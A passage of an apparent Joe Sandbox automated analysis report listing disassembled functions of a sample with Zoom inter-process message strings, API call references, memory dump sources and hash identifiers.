                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Json$com.zoom.app.assistant.control.system.scenes.prepared.notify
                • API String ID: 3166440930-3163986488
                • Opcode ID: af24f53e8d7bb83d150b0a3a8296348791b124af6267effd943d0744441d90d7
                • Instruction ID: 0cb83586b341bfe663aebce52623c40db1dc2c5d46fa961cdcf380c72ddbb82f
                • Opcode Fuzzy Hash: af24f53e8d7bb83d150b0a3a8296348791b124af6267effd943d0744441d90d7
                • Instruction Fuzzy Hash: 4EE0D8B594038167C720AB105C45B5E66B4B750756F50042EB2015B3D2CFF44884C775
                Function 00C6E490 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6E497
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.control.system.devices.updated.notify,00009D17,Json,00000004), ref: 00C6E4B2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Json$com.zoom.app.assistant.control.system.devices.updated.notify
                • API String ID: 3166440930-1372683036
                • Opcode ID: fa964a21830be67c3500aa1da667871541b2560a608f253ce02dffab0123208a
                • Instruction ID: 6cca50ef40372ca501b8f6d1d072f7a0a286e6eea2c9a89066a9d4f52ecc7640
                • Opcode Fuzzy Hash: fa964a21830be67c3500aa1da667871541b2560a608f253ce02dffab0123208a
                • Instruction Fuzzy Hash: 9DE0DFB4A103D5A7C720AB658C46B2E66A4AB58B26F40452DB2015B3D2CBF48984DF78
                Function 00C72440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72447
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.getuserlist.request,00009E81,JsCallID,00000004), ref: 00C72462
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.getuserlist.request
                • API String ID: 3166440930-460326380
                • Opcode ID: f9ed6c9aaf32b771b1340efdaad316bfe27838e6b8feb55e3aca887b396236a6
                • Instruction ID: 17c087c8073d24fb8bcb3eb84ff9df9d99f146d4cd3d2bb4c6695d94967380ed
                • Opcode Fuzzy Hash: f9ed6c9aaf32b771b1340efdaad316bfe27838e6b8feb55e3aca887b396236a6
                • Instruction Fuzzy Hash: 7BE0D8B0A103C0A7C710BB529C85B1F66B4E740716F00442CB2065F3D2CBF44844DF74
                Function 00C70470 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70477
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.device.created.notification,00009CF6,deviceGUID,00000004), ref: 00C70492
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.device.created.notification$deviceGUID
                • API String ID: 4281283084-4241061185
                • Opcode ID: a878ff8a70fee8c2db403dbb582567aef9b41725b8df0807bdd0fcbded0da6ce
                • Instruction ID: 584d35c519adbf3ee5bc9859804fe726abe5864e15d753864435801404a4e7b9
                • Opcode Fuzzy Hash: a878ff8a70fee8c2db403dbb582567aef9b41725b8df0807bdd0fcbded0da6ce
                • Instruction Fuzzy Hash: 2BE0DFB0A00384A7EB30BF14AC95B2E36A4AB90B5AF94457CB2045F382CFF84940E774
                Function 00C6A400 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A407
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.notifyDeviceReady,0000272D,Param,00000004), ref: 00C6A422
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Param$com.zoom.app.notifyDeviceReady
                • API String ID: 3166440930-3217939805
                • Opcode ID: 1d3542ce7465f31ba74ebcaa6b033d733af760e32fe6c4c55064bf0be34549df
                • Instruction ID: e0ba903a086d537c5d7f0650fb528581fcf4122cd0d04d1e4d5adbd15b60003d
                • Opcode Fuzzy Hash: 1d3542ce7465f31ba74ebcaa6b033d733af760e32fe6c4c55064bf0be34549df
                • Instruction Fuzzy Hash: E7E020F0900380D7C720AB505C89F6E66B4EF58766F40042DB2055F3D1CBF44844D776
                Function 00C70410 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70417
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.device.destroy.response,00009CF5,deviceGUID,00000004), ref: 00C70432
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.sip.virtual.audio.device.destroy.response$deviceGUID
                • API String ID: 4281283084-803702959
                • Opcode ID: 665d6f0a49dd4f55aeac4beb2a2e5c126191c602936c6978bdafb29e899cbfd8
                • Instruction ID: d5113ebb36bb84054e2f17a526f52e93a3181fb68ea0ff3dac5fda2486bc79ac
                • Opcode Fuzzy Hash: 665d6f0a49dd4f55aeac4beb2a2e5c126191c602936c6978bdafb29e899cbfd8
                • Instruction Fuzzy Hash: 24E0D8B0900384A7D710BF119C45F2E26A4DB41B15F904428B2045F392CFF44800DB74
                Function 00C6C5F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C5F7
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.conf.inter.process.audio.sharing.service.register.request,000027D5,needUserAudio,00000004), ref: 00C6C612
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.app.conf.inter.process.audio.sharing.service.register.request$needUserAudio
                • API String ID: 4281283084-1390595588
                • Opcode ID: dfcb524af863806ff8ae9f784d6333218293403f2be8a543ab714aac97dfe890
                • Instruction ID: 607dae75b463fe942db63fae47d1ec896c5bf3ecdaa379bad14ccb4c9f67a10c
                • Opcode Fuzzy Hash: dfcb524af863806ff8ae9f784d6333218293403f2be8a543ab714aac97dfe890
                • Instruction Fuzzy Hash: DEE0D8B09443C0A7D720BB148C4972F26A4AB4071AF800568B2455F3C2DBF44841D774
                Function 00C70590 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70597
                • ??0?$CmmMessageTemplate_1@H@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.sip.virtual.audio.speaker.destroy.response,00009CF9,deviceGUID,00000004), ref: 00C705B2
                  • Part of subcall function 00C866A0: __EH_prolog3.LIBCMT ref: 00C866A7
                  • Part of subcall function 00C89E35: __EH_prolog3_GS.LIBCMT ref: 00C89E3C
                  • Part of subcall function 00C89E35: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E59
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost,00002735,HostSnsType,00000004), ref: 00C89E87
                  • Part of subcall function 00C89E35: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost,HostSnsType,com.Zoom.app.conf.claimhost), ref: 00C89EC7
                  • Part of subcall function 00C89E35: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C6AD3D,com.Zoom.app.conf.claimhost), ref: 00C89EF6
                  • Part of subcall function 00C89E35: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C89F49
                  • Part of subcall function 00C89E35: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C89F66
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
